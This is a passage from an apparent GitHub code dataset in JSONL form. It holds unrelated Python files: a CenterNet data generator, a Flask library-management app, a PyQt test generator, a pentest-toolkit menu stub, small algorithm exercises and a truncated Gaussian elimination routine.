boxes[:,1]/self.input_size[0]*self.output_size[0]\n boxes[:,2] = boxes[:,2]/self.input_size[1]*self.output_size[1]\n boxes[:,3] = boxes[:,3]/self.input_size[0]*self.output_size[0]\n\n for i in range(len(y)):\n bbox = boxes[i].copy()\n bbox = np.array(bbox)\n bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, self.output_size[1] - 1)\n bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, self.output_size[0] - 1)\n cls_id = int(y[i,-1])\n \n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if h > 0 and w > 0:\n ct = np.array([(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n \n # 获得热力图\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n radius = max(0, int(radius))\n batch_hms[b, :, :, cls_id] = draw_gaussian(batch_hms[b, :, :, cls_id], ct_int, radius)\n \n batch_whs[b, i] = 1. * w, 1. * h\n # 计算中心偏移量\n batch_regs[b, i] = ct - ct_int\n # 将对应的mask设置为1,用于排除多余的0\n batch_reg_masks[b, i] = 1\n # 表示第ct_int[1]行的第ct_int[0]个。\n batch_indices[b, i] = ct_int[1] * self.output_size[0] + ct_int[0]\n\n # 将RGB转化成BGR\n img = np.array(img,dtype = np.float32)[:,:,::-1]\n batch_images[b] = preprocess_image(img)\n b = b + 1\n if b == self.batch_size:\n b = 0\n yield [batch_images, batch_hms, batch_whs, batch_regs, batch_reg_masks, batch_indices], np.zeros((self.batch_size,))\n\n batch_images = np.zeros((self.batch_size, self.input_size[0], self.input_size[1], 3), dtype=np.float32)\n\n batch_hms = np.zeros((self.batch_size, self.output_size[0], self.output_size[1], self.num_classes),\n dtype=np.float32)\n batch_whs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_regs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_reg_masks = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n batch_indices = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n","repo_name":"Bovbene/CenterNet-Keras","sub_path":"nets/center_training.py","file_name":"center_training.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5768978667","text":"class Solution:\n def merge_two_sorted_array(self, arr1: list, arr2: list) -> list:\n m = len(arr1)\n n = len(arr2)\n i, j = 0, 0\n res = []\n while i < m and j < n:\n if arr1[i] > arr2[j]:\n res.append(arr2[j])\n j += 1\n else:\n res.append(arr1[i])\n i += 1\n\n while i < m:\n res.append(arr1[i])\n i += 1\n\n while j < n:\n res.append(arr2[j])\n j += 1\n\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.merge_two_sorted_array([1, 2, 3, 4, 5, 6], [1, 2, 4, 5]))\n","repo_name":"SanjampreetSingh/YouTube-CodeSanjam","sub_path":"Sort/05. Merge two sorted array.py","file_name":"05. Merge two sorted array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28643460986","text":"from time import sleep\nfrom src.submenus.submenus import submenu_one, submenu_two, submenu_three\nfrom os import system\n\ndef menu_main():\n \n try:\n\n print(\"\"\"\n 1) Install tools of pentest\n 2) Red dragon Tools\n 3) System management \n -1) EXIT\n \n \"\"\")\n\n option_main = int(input(\"Your option: \"))\n\n if option_main == 1:\n \n submenu_one()\n\n elif option_main == 2:\n \n submenu_two()\n\n elif option_main == 3:\n \n submenu_three()\n\n elif option_main == -1:\n\n print(\"Goodbye...\")\n sleep(1)\n system(\"clear\")\n\n else:\n system(\"clear\")\n print(\"Invalid option. Try again.\")\n menu_main()\n \n except Exception as error:\n\n print(\"Error: {}\".format(error))\n \n\n","repo_name":"charlesdev771/Red-Dragon","sub_path":"src/menus/menu_main.py","file_name":"menu_main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24213243427","text":"import sys;\nimport os;\nimport subprocess;\nimport csv;\nimport hashlib;\n\nrepo = sys.argv[1] # '/home/rich/sstore3/gentoo-gitmig/cvs/checkout/gentoo-x86/'\nmodule = sys.argv[2] # 'gentoo-x86/'\n\noutfile=csv.writer(sys.stdout);\nos.chdir(repo);\n\nfor line in sys.stdin:\n line=line.strip();\n if len(line) > 0:\n for row in csv.reader([line]):\n filename,filetime,author,message,revision,state = row\n if state != \"dead\":\n output=subprocess.check_output([\"cvs\",\"co\",\"-p\",\"-r\",revision,module+filename]).split(\"\\n\")\n output='\\n'.join(output)\n final=\"blob \"+str(len(output))+\"\\x00\"+output;\n filehash=hashlib.sha1(final).hexdigest();\n newrow=filename,\"blob\",filehash,filetime,author,message,revision\n outfile.writerow(newrow)\n\n","repo_name":"rich0/gitvalidate","sub_path":"cvsdump/cvscalchash.py","file_name":"cvscalchash.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"41181077612","text":"import os\n\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QPushButton, QDialog, QListWidget, \\\n QLineEdit\n\nfrom code_tab.console import Console\nfrom ui.message_box import MessageBox\nfrom code_tab.syntax_highlighter import CodeEditor\nfrom ui.side_panel_widget import SidePanelWidget\n\n\nclass GeneratorTab(SidePanelWidget):\n complete = pyqtSignal()\n\n def __init__(self, sm, cm, tm):\n super().__init__(sm, tm, 'Генерация тестов', ['load', 'save', 'run', 'close'])\n self.setWindowTitle(\"TestGenerator\")\n self.resize(600, 400)\n\n self.cm = cm\n self.test_type = 'pos'\n\n main_layout = QVBoxLayout()\n main_layout.setContentsMargins(0, 0, 0, 0)\n\n self.code_edit = CodeEditor(self.sm, self.tm, language='Python', border=True)\n main_layout.addWidget(self.code_edit)\n\n self.console = Console(self.sm, self.tm, self.cm)\n self.console.hide()\n main_layout.addWidget(self.console)\n\n self.setLayout(main_layout)\n\n self.buttons['load'].clicked.connect(self.open_code)\n self.buttons['save'].clicked.connect(self.save_code)\n # self.buttons['documentation'].clicked.connect(self.show_info)\n self.buttons['close'].clicked.connect(self.close_console)\n self.buttons['run'].clicked.connect(self.run_code)\n\n self.set_autocompletion()\n\n self.dialog = None\n self.scripts_dir = f\"{self.sm.app_data_dir}/scripts\"\n\n def set_theme(self):\n super().set_theme()\n self.code_edit.set_theme()\n self.console.set_theme()\n\n def open_code(self):\n self.dialog = FileDialog(self.tm, 'open', self.scripts_dir)\n if self.dialog.exec():\n try:\n with open(os.path.join(self.scripts_dir, self.dialog.list_widget.currentItem().text()),\n encoding='utf-8') as f:\n self.code_edit.set_text(f.read())\n except Exception as ex:\n print(f\"{ex.__class__.__name__}: {ex}\")\n\n def save_code(self):\n self.dialog = FileDialog(self.tm, 'save', self.scripts_dir)\n if self.dialog.exec():\n try:\n name = self.dialog.line_edit.text()\n if not name.endswith('.py'):\n name += '.py'\n file = open(f\"{self.scripts_dir}/{name}\", 'w', encoding='utf-8',\n newline=self.sm.line_sep)\n file.write(self.code_edit.text())\n file.close()\n except Exception as ex:\n print(f\"{ex.__class__.__name__}: {ex}\")\n\n def set_autocompletion(self):\n self.code_edit.autocomplitions = [\"open_in_file(test_num, mode='w', **kwargs)\",\n \"open_out_file(test_num, mode='w', **kwargs)\",\n \"open_args_file(test_num, mode='w', **kwargs)\",\n \"write_in(test_num, data, mode='w', **kwargs)\",\n \"write_out(test_num, data, mode='w', **kwargs)\",\n \"write_args(test_num, data, mode='w', **kwargs)\",\n \"test_count\",\n \"set_desc(test_num, desc)\",\n \"add_test(in_data='', out_data='', args='', desc='-', index=None)\",\n \"path\"]\n\n def run_code(self):\n os.makedirs(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}\", exist_ok=True)\n file = open(f'{self.sm.app_data_dir}/temp.py', 'w', encoding='utf-8', newline=self.sm.line_sep)\n file.write(self.previous_code())\n file.write(self.code_edit.text())\n file.close()\n\n self.code_edit.hide()\n self.buttons['load'].hide()\n self.buttons['save'].hide()\n self.buttons['run'].hide()\n self.buttons['close'].show()\n self.console.show()\n self.console.run_file(f'{self.sm.app_data_dir}/temp.py')\n\n # self.looper = self.cm.cmd_command_looper([self.sm.get_general('python'), f'{self.sm.app_data_dir}/temp.py'])\n # self.looper.complete.connect(self.run_complete)\n # self.looper.run()\n\n def close_console(self):\n self.console.hide()\n self.code_edit.show()\n self.buttons['close'].hide()\n self.buttons['load'].show()\n self.buttons['save'].show()\n self.buttons['run'].show()\n\n def show_info(self):\n MessageBox(MessageBox.Information, \"Генерация тестов\",\n f\"class Test:\\n\"\n f\" def __init__(self, desc='', in_data='', out_data='', args='', exit='')\\n\"\n f\" def set_desc(self, desc)\\n\"\n f\" def set_in(self, in_data)\\n\"\n f\" def set_in(self, text)\\n\"\n f\" def set_out(self, text)\\n\"\n f\" def set_args(self, args)\\n\"\n f\" def set_exit(self, exit='')\\n\"\n f\" def add_in_file(self, type='txt', text='')\\n\"\n f\" def add_out_file(self, type='txt', text='')\\n\"\n f\" def add_check_file(self, index: int, type='txt', text='')\\n\\n\"\n f\"def add_test(test: Test, index=None)\", self.tm)\n\n def previous_code(self):\n return f\"\"\"\nimport json\n\n__tests_list__ = []\n\n\nclass Test:\n def __init__(self, desc='', in_data='', out_data='', args='', exit=''):\n self.dict = {{'desc': desc, 'in': in_data, 'out': out_data, 'args': args, 'exit': exit, 'in_files': [],\n 'out_files': [], 'check_files': dict()}}\n\n def __getitem__(self, item):\n return self.dict[item]\n\n def __setitem__(self, item, value):\n self.dict[item] = value\n\n def set_desc(self, desc):\n self.dict['desc'] = str(desc)\n\n def set_in(self, text):\n self.dict['in'] = str(text)\n\n def set_out(self, text):\n self.dict['out'] = str(text)\n\n def set_args(self, args):\n self.dict['args'] = str(args)\n\n def set_exit(self, exit=''):\n self.dict['exit'] = str(exit)\n \n def add_in_file(self, type='txt', text=''):\n self.dict['in_files'].append({{'type': type, 'text': text}})\n \n def add_out_file(self, type='txt', text=''):\n self.dict['out_files'].append({{'type': type, 'text': text}})\n \n def add_check_file(self, index: int, type='txt', text=''):\n self.dict['check_files'][index] = {{'type': type, 'text': text}}\n \n \nfor el in {os.listdir(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}\")}:\n if el.rstrip('.json').isdigit():\n test = Test()\n try:\n with open(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}/{{el}}\", encoding='utf-8') as f:\n for key, item in json.loads(f.read()).items():\n test[key] = item\n __tests_list__.append(test)\n except json.JSONDecodeError:\n pass\n except ValueError:\n pass\ntest_count = len(__tests_list__)\npath = \"{self.sm.lab_path()}\"\ndata_path = \"{self.sm.data_lab_path()}\"\n\n\ndef add_test(test: Test, index=None):\n if index is None:\n index = len(__tests_list__) + 1\n __tests_list__.append(test)\n else:\n __tests_list[index] = test\n with open(f\"{{data_path}}/func_tests/{self.test_type}/{{index}}.json\", 'w', encoding='utf-8') as f:\n f.write(json.dumps(test.dict))\n\n\"\"\"\n\n def show(self) -> None:\n self.setDisabled(False)\n super().show()\n\n\nclass FileDialog(QDialog):\n def __init__(self, tm, mode='open', scripts_dir=''):\n super(FileDialog, self).__init__()\n self.mode = mode\n self.tm = tm\n\n os.makedirs(scripts_dir, exist_ok=True)\n\n main_layout = QVBoxLayout()\n\n self.list_widget = QListWidget()\n self.list_widget.addItems(filter(lambda s: s.endswith('.py'), os.listdir(scripts_dir)))\n\n if self.mode == 'save':\n self.line_edit = QLineEdit()\n main_layout.addWidget(self.line_edit)\n self.list_widget.currentItemChanged.connect(lambda item: self.line_edit.setText(item.text()))\n self.list_widget.doubleClicked.connect(lambda: self.accept() if self.list_widget.currentItem() else None)\n\n main_layout.addWidget(self.list_widget)\n\n buttons_layout = QHBoxLayout()\n buttons_layout.setAlignment(Qt.AlignRight)\n\n self.button_cancel = QPushButton(\"Отмена\")\n buttons_layout.addWidget(self.button_cancel)\n self.button_cancel.clicked.connect(self.reject)\n self.button_cancel.setFixedSize(80, 24)\n self.button_ok = QPushButton(\"Ок\")\n buttons_layout.addWidget(self.button_ok)\n self.button_ok.clicked.connect(self.accept)\n self.button_ok.setFixedSize(80, 24)\n\n main_layout.addLayout(buttons_layout)\n self.setLayout(main_layout)\n\n self.set_theme()\n\n def set_theme(self):\n self.setStyleSheet(self.tm.bg_style_sheet)\n for el in [self.button_cancel, self.button_ok, self.list_widget]:\n self.tm.auto_css(el)\n if self.mode == 'save':\n self.tm.auto_css(self.line_edit)\n","repo_name":"SergeiKrivko/TestGenerator","sub_path":"tests/generator_window.py","file_name":"generator_window.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"5227409043","text":"from flask import Flask\r\nfrom flask import render_template\r\nfrom flask import request\r\nfrom flask import redirect\r\nfrom flask import url_for\r\nimport re\r\nfrom datetime import datetime\r\nfrom datetime import date\r\nimport mysql.connector\r\nfrom mysql.connector import FieldType\r\nimport connect\r\n\r\napp = Flask(__name__)\r\n\r\ndbconn = None\r\nconnection = None\r\nuser= None\r\n\r\ndef getCursor():\r\n global dbconn\r\n global connection\r\n connection = mysql.connector.connect(user=connect.dbuser, \\\r\n password=connect.dbpass, host=connect.dbhost, \\\r\n database=connect.dbname, autocommit=True)\r\n dbconn = connection.cursor()\r\n return dbconn\r\n \r\n\r\n# The public interface\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/homepage\", methods=[\"GET\"])\r\ndef homepage():\r\n member=request.args.get(\"member\") \r\n staff=request.args.get(\"staff\")\r\n global user\r\n if member:\r\n user=member\r\n return render_template(\"memberHome.html\", member=user)\r\n elif staff:\r\n user=staff\r\n return render_template(\"staffHome.html\", staff=user)\r\n return render_template(\"login.html\")\r\n\r\n@app.route (\"/allbooks\")\r\ndef allbooks():\r\n connection = getCursor()\r\n connection.execute(\"SELECT bookid, booktitle, author, category, \\\r\n yearofpublication FROM books ;\")\r\n bookList = connection.fetchall()\r\n return render_template (\"allbooks.html\", booklist = bookList, member=user)\r\n\r\n#Search the available books by title and/or author, See the availability of all copies of a book, whether a copy is on loan and, if so, the due date.\r\n\r\n@app.route (\"/search\")\r\ndef search():\r\n return render_template(\"search.html\", member=user)\r\n\r\n# show results of the book search, get input value from forms, allow for partial text searches\r\n@app.route (\"/searchresult\", methods=[\"POST\"])\r\ndef searchresult():\r\n searchinput=request.form.get(\"searchinput\")\r\n searchinput = \"%\" + searchinput + \"%\"\r\n connection = getCursor()\r\n\r\n connection.execute(\"SELECT books.bookid, books.booktitle, books.author, bookcopies.bookcopyid, bookcopies.format,\\\r\n loans.returned, DATEDIFF(CURDATE(),loans.loandate) \\\r\n FROM bookcopies LEFT JOIN books on books.bookid = bookcopies.bookid LEFT JOIN loans \\\r\n on bookcopies.bookcopyid=loans.bookcopyid WHERE booktitle LIKE %s OR author LIKE %s;\",(searchinput, searchinput, )) \r\n result_list = connection.fetchall()\r\n print (result_list)\r\n\r\n return render_template (\"result.html\", result_list = result_list, member=user)\r\n@app.route(\"/staff/allbooks\")\r\ndef staffallbooks():\r\n return render_template(\"staffallbooks.html\", staff=user)\r\n\r\n#Search the available books by title and/or author, See the availability of all copies of a book, whether a copy is on loan and, if so, the due date.\r\n@app.route(\"/staff/searchbook\")\r\ndef staffsearchbook():\r\n return render_template(\"staffsearchbook.html\", staff=user)\r\n\r\n## show results of the book search, get input value from forms, allow for partial text searches. \r\n@app.route (\"/staffsearchbookresult\", methods=[\"POST\"])\r\ndef staffsearchresult():\r\n searchinput=request.form.get(\"searchinput\")\r\n searchinput = \"%\" + searchinput + \"%\"\r\n connection = getCursor()\r\n\r\n connection.execute(\"SELECT books.bookid, books.booktitle, books.author, bookcopies.bookcopyid, bookcopies.format,\\\r\n loans.returned, DATEDIFF(CURDATE(),loans.loandate) \\\r\n FROM bookcopies LEFT JOIN books on books.bookid = bookcopies.bookid LEFT JOIN loans \\\r\n on bookcopies.bookcopyid=loans.bookcopyid WHERE booktitle LIKE %s OR author LIKE %s;\",(searchinput, searchinput, )) \r\n result_list = connection.fetchall()\r\n\r\n\r\n return render_template (\"result.html\", result_list = result_list, staff=user)\r\n\r\n #Issue a book to a borrower. Physical Books can only be loaned once at a time , eBooks and Audio Books can be loaned multiple times simultaneously\r\n#staff type in book copy id and borrower id\r\n@app.route(\"/staff/issuebooks\")\r\ndef issuebooks():\r\n return render_template(\"issuebooks.html\", staff=user)\r\n\r\n#show results of issuing books and update database.\r\n@app.route( \"/staff/issuebooks_result\", methods=[\"GET\", \"POST\"])\r\ndef issuebooks_result():\r\n bookcopyid=request.form.get(\"bookid\")\r\n borrowerid=request.form.get(\"borrowerid\")\r\n todaydate = datetime.now().date()\r\n connection = getCursor()\r\n connection.execute ( \"SELECT bookcopies.bookcopyid, bookcopies.format, loans.borrowerid, loans.returned, loans.loandate From loans RIGHT JOIN bookcopies \\\r\n on loans.bookcopyid=bookcopies.bookcopyid WHERE bookcopies.bookcopyid = %s ORDER by loans.loandate DESC LIMIT 1 ;\", (bookcopyid, ) )\r\n loans= connection.fetchall()\r\n print (loans)\r\n #an if condition to test if the book is a Physical one or not\r\n if loans[0][1] == \"eBook\" or loans[0][1] == \"Audio Book\" :\r\n connection = getCursor()\r\n connection.execute ( \" INSERT INTO loans (bookcopyid, borrowerid , loandate, returned) VALUES (%s, %s,%s,0);\", (bookcopyid, borrowerid, todaydate, ) )\r\n return render_template (\"issuebook_success.html\", bookcopyid=bookcopyid, borrowerid=borrowerid, todaydate=todaydate, staff=user)\r\n\r\n elif (loans[0][1] == \"Hardcover\" or \"paperback\" or \"Illustrated\") and (loans[0][3] == 1 or loans[0][3] == None):\r\n connection = getCursor()\r\n connection.execute ( \" INSERT INTO loans (bookcopyid, borrowerid , loandate, returned) VALUES (%s, %s,%s,0);\", (bookcopyid, borrowerid, todaydate, ) )\r\n return render_template(\"issuebook_success.html\", bookcopyid=bookcopyid, borrowerid=borrowerid, todaydate=todaydate, staff=user)\r\n \r\n else:\r\n return render_template( \"issuebook_fail.html\", staff=user)\r\n\r\n\r\n#Return a book that has been on loan\r\n@app.route(\"/staff/returnbooks\")\r\ndef returnbooks():\r\n return render_template(\"returnbooks.html\", staff=user) \r\n\r\n#return results\r\n@app.route(\"/staff/returnbooks_result\", methods=[\"GET\", \"POST\"] )\r\ndef returnbooks_result():\r\n bookcopyid=request.form.get(\"bookid\")\r\n borrowerid=request.form.get(\"borrowerid\")\r\n todaydate = datetime.now().date()\r\n connection = getCursor()\r\n connection.execute ( \" UPDATE loans SET returned = 1 WHERE bookcopyid= %s AND borrowerid= %s;\", (bookcopyid, borrowerid, ))\r\n return render_template(\"return_success.html\", borrowerid=borrowerid, bookcopyid=bookcopyid, todaydate=todaydate, staff=user )\r\n\r\n\r\n# View the details of a borrower, searching by name or by borrower id.\r\n@app.route(\"/staff/borrowersearch\")\r\ndef borrowersearch():\r\n return render_template(\"borrowersearch.html\", staff=user) \r\n\r\n#show borrowe rsearch results\r\n\r\n@app.route(\"/staff/borrowersearchresult\", methods=[\"GET\", \"POST\"])\r\ndef borrowersearchresult():\r\n name=request.form.get(\"name\")\r\n namesearch = \"%\" + name + \"%\"\r\n borrowerid =request.form.get(\"borrowerid\")\r\n borroweridsearch= \"%\" + borrowerid + \"%\"\r\n connection = getCursor()\r\n \r\n \r\n if borrowerid == '':\r\n connection.execute(\"SELECT * from borrowers WHERE firstname LIKE %s OR familyname LIKE %s;\", (namesearch, namesearch, ))\r\n result_list = connection.fetchall()\r\n\r\n elif name == '':\r\n connection.execute(\"SELECT * from borrowers WHERE borrowerid LIKE %s;\", (borroweridsearch, ))\r\n result_list = connection.fetchall() \r\n\r\n else:\r\n connection.execute (\"SELECT * from borrowers WHERE borrowerid LIKE %s AND (familyname LIKE %s OR firstname LIKE %s);\", (borroweridsearch,namesearch, namesearch,)) \r\n result_list = connection.fetchall()\r\n \r\n \r\n return render_template (\"borrowerresult.html\", staff=user,name=name, borrowerid=borrowerid, result_list = result_list)\r\n \r\n\r\n# Update the details of a borrower\r\n@app.route(\"/staff/updateborrower\")\r\ndef updateborrower():\r\n return render_template(\"updateborrower.html\", staff=user) \r\n\r\n\r\n# get the borrower id that the staff wants to update\r\n@app.route(\"/staff/borrowerid\", methods=[\"GET\", \"POST\"])\r\ndef staffborrowerid():\r\n id=request.form.get(\"id\")\r\n connection = getCursor()\r\n connection.execute (\"SELECT * from borrowers WHERE borrowerid = %s;\", (id,) )\r\n results= connection.fetchone()\r\n print (results)\r\n\r\n return render_template(\"iddetails.html\", id=id, results=results, staff=user ) \r\n\r\n#upda information to the database\r\n@app.route(\"/staff/updateinfo\", methods=[\"GET\", \"POST\"])\r\ndef staffupdateinfo():\r\n ID=request.form.get(\"id\")\r\n Firstname=request.form.get(\"firstname\")\r\n Familyname=request.form.get(\"familyname\")\r\n Dateofbirth=request.form.get(\"dateofbirth\")\r\n Housenumbername=request.form.get(\"housenumbername\")\r\n Street=request.form.get(\"street\")\r\n Town=request.form.get(\"town\")\r\n City=request.form.get(\"city\")\r\n Postalcode=request.form.get(\"postalcode\")\r\n connection = getCursor()\r\n connection.execute ( \"UPDATE borrowers SET firstname=%s, familyname=%s,\\\r\n dateofbirth=%s, housenumbername=%s, street=%s, town=%s, \\\r\n city=%s, postalcode=%s WHERE borrowerid= %s;\" , (Firstname, Familyname, Dateofbirth,\\\r\n Housenumbername, Street, Town, City, Postalcode, ID, ))\r\n connection.execute ( \"SELECT * FROM borrowers WHERE borrowerid= %s;\" , (ID, ) )\r\n results_list = connection.fetchall()\r\n print (results_list)\r\n return render_template (\"updateconfirm.html\", ID=ID, results_list= results_list, staff=user)\r\n\r\n\r\n \r\n#Add a new borrower\r\n@app.route(\"/staff/addborrower\")\r\ndef addborrower():\r\n return render_template(\"addborrower.html\", staff=user)\r\n\r\n\r\n#get all input value from users and insert into database\r\n@app.route(\"/staff/addborrowerinfo\", methods=[\"GET\", \"POST\"])\r\ndef addborrowerinfo():\r\n Firstname=request.form.get(\"firstname\")\r\n Familyname=request.form.get(\"familyname\")\r\n Dateofbirth=request.form.get(\"dateofbirth\")\r\n Housenumbername=request.form.get(\"housenumbername\")\r\n Street=request.form.get(\"street\")\r\n Town=request.form.get(\"town\")\r\n City=request.form.get(\"city\")\r\n Postalcode=request.form.get(\"postalcode\")\r\n connection = getCursor()\r\n connection.execute ( \"INSERT INTO borrowers (firstname, familyname, dateofbirth, housenumbername, street, town, \\\r\n city, postalcode ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s );\", (Firstname, Familyname, Dateofbirth,\\\r\n Housenumbername, Street, Town, City, Postalcode, ))\r\n connection.execute ( \"SELECT * from borrowers ORDER BY borrowerid DESC LIMIT 1;\")\r\n results_list = connection.fetchall()\r\n\r\n print (results_list)\r\n return render_template (\"addconfirm.html\", results_list= results_list, staff=user)\r\n\r\n@app.route(\"/staff/reports\")\r\ndef reports():\r\n return render_template (\"reports.html\", staff=user)\r\n\r\n#Display a list of all overdue books & their borrowers. Group all overdue books by borrower \r\n@app.route(\"/staff/overduebooks\")\r\ndef overduebooks():\r\n connection = getCursor()\r\n connection.execute ( \" SELECT borrowers.firstname, borrowers.familyname, loans.borrowerid, books.booktitle, bookcopies.bookcopyid, DATEDIFF(CURDATE(),loans.loandate) AS daysonLoan FROM borrowers \\\r\n INNER JOIN loans on loans.borrowerid=borrowers.borrowerid\\\r\n INNER JOIN bookcopies on loans.bookcopyid= bookcopies.bookcopyid \\\r\n INNER JOIN books on books.bookid=bookcopies.bookid\\\r\n WHERE loans.returned = 0 and DATEDIFF(CURDATE(),loans.loandate) >=35;\")\r\n overdue_list=connection.fetchall()\r\n print ( overdue_list) \r\n return render_template(\"overduebooks.html\", overdue_list=overdue_list, staff=user) \r\n\r\n#Display a list (Loan Summary) showing the number of times each book has been loaned in total.\r\n@app.route(\"/staff/loansummary\")\r\ndef loansummary():\r\n connection = getCursor()\r\n connection.execute (\"SELECT books.bookid, books.booktitle, COUNT(loans.loanid) FROM loans LEFT JOIN bookcopies \\\r\n ON bookcopies.bookcopyid=loans.bookcopyid INNER JOIN books ON books.bookid=bookcopies.bookid \\\r\n GROUP BY bookcopies.bookid ORDER BY COUNT(loans.loanid) DESC;\")\r\n loansummary=connection.fetchall()\r\n\r\n return render_template(\"loansummary.html\", loansummary=loansummary, staff=user) \r\n\r\n#Display a list (Borrower Summary) showing all borrowers and the number of loans (past and current combined) in total they each have had.\r\n@app.route(\"/staff/borrowersummary\")\r\ndef borrowersummary():\r\n connection = getCursor()\r\n connection.execute (\" SELECT borrowers.borrowerid, borrowers.firstname,borrowers.familyname, COUNT(loans.loanid) FROM loans LEFT JOIN borrowers \\\r\n ON borrowers.borrowerid=loans.borrowerid GROUP BY loans.borrowerid ORDER BY COUNT(loans.loanid) DESC;\")\r\n borrowersummary=connection.fetchall()\r\n return render_template(\"borrowersummary.html\", borrowersummary=borrowersummary, staff=user) \r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"SherlynDuan/636-final-library-app","sub_path":"librarywebapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32962603000","text":"#!/usr/bin/python\n#\n# Browser.py - a browser menu for a given directory\n#\n# (c) David Haworth\n\nfrom Menu import Menu, MenuThing\nfrom Config import radiopi_cfg\nimport os\n\nclass Browser(Menu):\n\tdef __init__(self, ui, lcd, eq, dir):\n\t\tMenu.__init__(self, ui, lcd, eq)\n\t\tself.things.append(MenuThing('Add all',\tself.AddAll,\tdir))\t# Might get removed later\n\t\tself.things.append(MenuThing('Back',\tself.Back,\t\t''))\n\n\t\tfiles = os.listdir(dir)\n\t\tfiles.sort()\n\n\t\t# Add directories first\n\t\tfor f in files:\n\t\t\tff = os.path.join(dir, f)\n\t\t\tif os.path.isdir(ff):\n\t\t\t\tself.things.append(MenuThing(f,\tself.DirAction,\tff))\n\n\t\t# Add playable files. Ignore all others\n\t\tnPlayable = 0\n\t\tfor f in files:\n\t\t\tff = os.path.join(dir, f)\n\t\t\tif self.IsPlayable(ff):\n\t\t\t\tnPlayable += 1\n\t\t\t\tself.things.append(MenuThing(f,\tself.FileAction, ff))\n\n\t\t# If there are no playable files, remove the Add All option.\n\t\tif nPlayable == 0:\n\t\t\tself.things.pop(0)\n\n\t# MPD appears to trigger an exception for non-playable files (CommandError) so for\n\t# the moment we only check if it's a file.\n\t# WARNING: the add command claims to be recursive for directories, but appears not to work.\n\tdef IsPlayable(self, f):\n\t\t(n,e) = os.path.splitext(f.lower())\n\t\treturn os.path.isfile(f) and e in radiopi_cfg.music_sfx\n\n\t# Add all the playable files in the MenuThing's directory\n\tdef AddAll(self, mt, evt):\n\t\tif evt == 'ok':\n\t\t\tself.eq.PutEvent(\"add \" + mt.data)\n\t\t\tself.Ack()\n\t\t\treturn True\n\t\treturn False\n\n\tdef DirAction(self, mt, evt):\n\t\tif evt == 'red':\n\t\t\treturn self.AddAll(mt, 'ok')\n\t\telif evt == 'ok' or evt == 'right':\n\t\t\tself.ui.EnterBrowser(mt.data)\n\t\t\treturn True\n\t\treturn False\n\n\tdef FileAction(self, mt, evt):\n\t\tif evt == 'ok':\n\t\t\tself.eq.PutEvent(\"add \" + mt.data)\n\t\t\tself.Ack()\n\t\t\treturn True\n\t\treturn False\n","repo_name":"TheLancashireman/RadioPi","sub_path":"controller/Browser.py","file_name":"Browser.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74733538170","text":"# Comment it before submitting\n# class Node:\n# def __init__(self, value, left=None, right=None):\n# self.value = value\n# self.right = right\n# self.left = left\n\n\ndef tree_len(Node):\n if Node.left is None and Node.right is None:\n return 1\n\n left_len = 0\n if Node.left is not None:\n left_len = tree_len(Node.left)\n\n right_len = 0\n if Node.right is not None:\n right_len = tree_len(Node.right)\n\n return 1 + max(left_len, right_len)\n\n\ndef solution(Node) -> bool:\n balanced = True\n\n if Node is None:\n return balanced\n\n if (Node.left is None) and (Node.right is None):\n return balanced\n\n left_len = 0\n if Node.left is not None:\n left_len = tree_len(Node.left)\n\n right_len = 0\n if Node.right is not None:\n right_len = tree_len(Node.right)\n\n diff = left_len - right_len\n\n if abs(diff) <= 1 and solution(Node.right) is True and solution(Node.left) is True:\n return True\n\n return False\n","repo_name":"DimaZzZz101/Yandex_Practicum_Algorithms","sub_path":"Sprint_5/Practice/B/balansed_tree.py","file_name":"balansed_tree.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37469186960","text":"import numpy as np\n\n#Function enumerating gauss elimination's two steps\ndef gauss_elimination(a,n):\n x = forward_elimination(a,n)\n print(\"Final\")\n print(a)\n if x!=-1:\n print(\"Singular matrix\")\n if a[x,n]!=0:\n print(\"Inconsistent solution\")\n else:\n print(\"Infinite solutions\")\n back_substitution(a,n)\n\n#Function to swap two rows\ndef swap(a,n,i,j):\n for k in range(n+1):\n temp = a[i,k]\n a[i,k] = a[j,k]\n a[j,k] = temp\n\n#Function to perform forward elimination\ndef forward_elimination(a,n):\n for k in range(n):\n index = k\n value = a[index,k]\n \n for i in range(k+1,n):\n if int(a[i,k])>value:\n index = i\n value = a[i,k]\n \n if 